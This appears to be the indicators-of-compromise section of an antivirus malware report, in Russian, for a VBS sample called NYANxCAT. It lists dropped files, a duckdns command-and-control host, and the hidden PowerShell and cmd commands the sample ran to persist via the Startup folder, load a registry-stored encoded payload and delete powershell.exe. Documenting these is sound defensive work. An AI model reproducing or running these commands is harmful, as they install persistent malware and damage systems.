Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\nyanxcat.vbs
- %APPDATA%\uwehmxzbdo.vbs
- 'oc#####28.duckdns.org':6633
- DNS ASK oc#####28.duckdns.org
- '<SYSTEM32>\wscript.exe' //B "%APPDATA%\uwEHmXZBdO.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';' (со скрытым окном)
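- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...' (со скрытым окном)
  Примечание: видимая часть аргумента -enc (Base64, UTF-16LE) декодируется как « $text = ((Get-ItemProperty HKCU:\Software\NYANxCAT\).NYANx…», то есть команда читает значение из раздела реестра HKCU\Software\NYANxCAT; остальная часть строки в отчёте обрезана.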
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '<PATH_SAMPLE>.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\NYANxCAT.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4A...
- '<SYSTEM32>\cmd.exe' /C Y /N /D Y /T 1 & Del "<SYSTEM32>\WindowsPowerShell\v1.0\powershell.exe"